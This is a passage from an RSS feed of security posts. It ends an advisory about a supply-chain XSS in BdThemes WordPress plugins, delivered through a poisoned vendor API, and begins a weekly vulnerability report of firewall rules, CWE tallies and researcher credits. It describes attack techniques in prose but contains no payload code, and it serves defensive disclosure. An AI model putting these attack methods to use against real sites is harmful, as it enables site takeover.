<li><b>2026-03-01</b>: <em>Biggopti</em> API JS added to Prime Slider v4.1.9 (SVN <code>r3471891</code>). <code>display_id</code> unescaped in <code>id</code> attribute. API endpoint: <code>api-data-records</code>.</li>
<li><b>2026-05-10</b>: Endpoint changed to <code>api-data-all-records</code>. DOMParser sanitizer added for content field, <code>id</code> attribute still unescaped.</li>
<li><b>2026-06-23</b>: <code>start_date</code> in the poisoned API campaign (“Summer Sale” notice). The earliest possible date the XSS could have been active.</li>
<li><b>2026-08-06 22:40 UTC</b>: Last-Modified on poisoned <code>api-data-records</code></li>
<li><b>2026-08-07 09:11 UTC</b>: Last-Modified on poisoned <code>api-data-all-records</code></li>
<li><b>2026-08-07</b>: Threat Intelligence Team notified, attack observed in the wild.</li>
<li><b>2026-08-07</b>: Plugins closed on WordPress directory pending review.</li>
<li><b>2026-08-07 16:56 UTC</b>: Investigation artifacts captured.</li>
<li><b>2026-08-08</b>: Both API endpoints now returns clean JSON</li>
</ul>
<h2>Conclusion</h2>
<p>In this blog post we detailed a Cross-Site Scripting (XSS) vulnerability, leveraged by an API-driven supply chain compromise, within the BdThemes plugin ecosystem. This vulnerability allows threat actors to execute arbitrary JavaScript inside an authenticated administrator’s browser session by poisoning the remote JSON promotional data stream fetched from the vendor’s object-storage bucket.</p>
<p>This supply chain attack demonstrates the evolving threat landscape facing WordPress site owners. Rather than altering plugin source code or exploiting a traditional server-side flaw, the attackers compromised the vendor’s remote data pipeline, turning trusted administrative banner notices into malware delivery vehicles.</p>
<p>Successful exploitation leads to full site compromise, enabling attackers to silently create rogue administrative accounts, upload webshells, and deploy persistence backdoors. Because plugin files remain unmodified on disk, we encourage all WordPress site owners running BdThemes plugins to immediately audit their database user lists, plugin directories, and database option table for any indicators of compromise.</p>
<p>Wordfence<a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener"> Premium</a>,<a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener"> Care</a> and<a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener"> Response</a> users, as well as paid<a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener"> Wordfence CLI</a> customers, received malware signatures and WAF rules to detect this supply chain compromise on August 7th, 2026. Wordfence free users and Wordfence CLI free users will receive these signatures and rules after the standard 30-day delay.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/08/psa-supply-chain-compromise-in-bdthemes-ecosystem-via-poisoned-api-response/" target="_blank" rel="noopener">PSA: Supply Chain Compromise in BdThemes Ecosystem via Poisoned API Response</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (July 27, 2026 to August 2, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-27-2026-to-august-2-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Sat, 08 Aug 2026 01:38:41 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-27-2026-to-august-2-2026/</guid>

					<description><![CDATA[Last week, there were 224 vulnerabilities disclosed in 177 WordPress Plugins and 2 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 119 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 224 vulnerabilities disclosed in 177 WordPress Plugins and 2 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 119 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates/wpmu-dev-dashboard-500-authentication-bypass-to-arbitrary-plugin-installation-remote-code-execution-via-forged-wdp-auth-hmac-on-wpmudev-hub-endpoint" target="_blank" rel="noopener">WPMU DEV Dashboard &lt;= 5.0.0 – Authentication Bypass to Arbitrary Plugin Installation (Remote Code Execution) via Forged WDP_AUTH HMAC on ?wpmudev-hub= Endpoint</a></li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder/advanced-responsive-video-embedder-for-rumble-odysee-youtube-vimeo-kick-1087-unauthenticated-authentication-bypass-via-hardcoded-backdoor-in-wplogin-parameter" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 10.8.7 – Unauthenticated Authentication Bypass via Hardcoded Backdoor in ‘_wplogin’ Parameter</a></li>
<li>WAF-RULE-935 – Data redacted while we work with the vendor on a patch.</li>
<li>WAF-RULE-937 – Data redacted while we work with the vendor on a patch.</li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">186</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">38</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">150</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">61</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">13</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">72</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">47</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">31</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Authentication Bypass by Alternate Name</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Authentication Bypass Using an Alternate Path or Channel</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Embedded Malicious Code</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>External Control of Assumed-Immutable Web Parameter</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Privilege Assignment</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Unverified Password Change</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">49</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">26</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/804a3b07eb5cd875d04cf09c04e08a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="804a3b07eb5cd875d04cf09c04e08a23"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-lipin" target="_blank" rel="noopener">Jakub Lipiński (A3RES)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cf19879c40314b138910d3ea903fbba3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf19879c40314b138910d3ea903fbba3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener">Jayant Kamble</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/05c109de991b49e44631bb886e85be4f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05c109de991b49e44631bb886e85be4f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anony-2" target="_blank" rel="noopener">maru</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/028356566add2ba7dc84bb512e36fc3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="028356566add2ba7dc84bb512e36fc3e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lqc" target="_blank" rel="noopener">lqc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/85f293dee3eecb01177cc42abdc331b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="85f293dee3eecb01177cc42abdc331b1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener">dyingman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/51a3cddbc5b4b4bda2364dff4f57dfed.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51a3cddbc5b4b4bda2364dff4f57dfed"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener">Phyo Ko Ko</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e97952602dfd17f0532ab6202b1dd0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e97952602dfd17f0532ab6202b1dd0db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kr0d" target="_blank" rel="noopener">kr0d</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/687b1a67f8c4dd6f731d33a8b3b970d4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="687b1a67f8c4dd6f731d33a8b3b970d4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/peb" target="_blank" rel="noopener">Deadbee</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
